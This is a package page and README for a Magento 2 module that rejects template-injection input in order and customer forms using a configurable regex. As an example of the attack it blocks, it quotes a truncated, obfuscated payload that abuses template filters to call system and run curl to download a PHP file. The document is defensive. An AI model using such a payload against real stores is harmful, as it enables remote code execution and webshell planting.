wapone / module-input-fields-validator
Custom Magento 2 module for input fields validation.
Installs: 142
Dependents: 0
Suggesters: 0
Security: 0
Stars: 2
Watchers: 4
Forks: 3
Open Issues: 1
Type:magento2-module
Requires
- php: ^7||^8
- magento/framework: *
README
Extension description
Disallow random code injection in Magento 2 forms trough API or WEB requests for: Order Creation, Customer Creation, Customer Name Update, Customer Address Update
Random code like:
{{var this.getTemp lateFil ter().filt er(order)}} {{var this.getTemp lateFil ter().add AfterFil terCallb ack(system).Fil ter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS....
The rejection mechanism is based on a configurable regular expression.
The default regular expression is '/[{}<>%]/' to reject characters like: { } < > %
It is also possible to configure a limit of characters to use only for the firstname and lastname fields validation.
Configurations
Configuration Section
- Enable: enable/disable module;
- Regular Expression: the regular expression to reject input values;
- Characters Limit: the limit of characters to use only for the firstname and lastname fields validation;
- Region Fields Validation: enable/disable the validation of region fields.
Notifications Section
- Enable invalidation fields results notification: enable/disable invalidation fields results notification;
- Email addresses for invalidation fields results notification: Email addresses to receive invalidation fields results.
Notification
The extension provides the possibility to email to configurable addresses at the end of process to notify the invalidation fields results.
Logs
The log file is in the path: /var/log/wapone_input_fields_validator.log
Installation Using Composer (recommended)
composer require wapone/module-input-fields-validator
Contribution
Forked from bafmaamy/Magento-FieldValidator.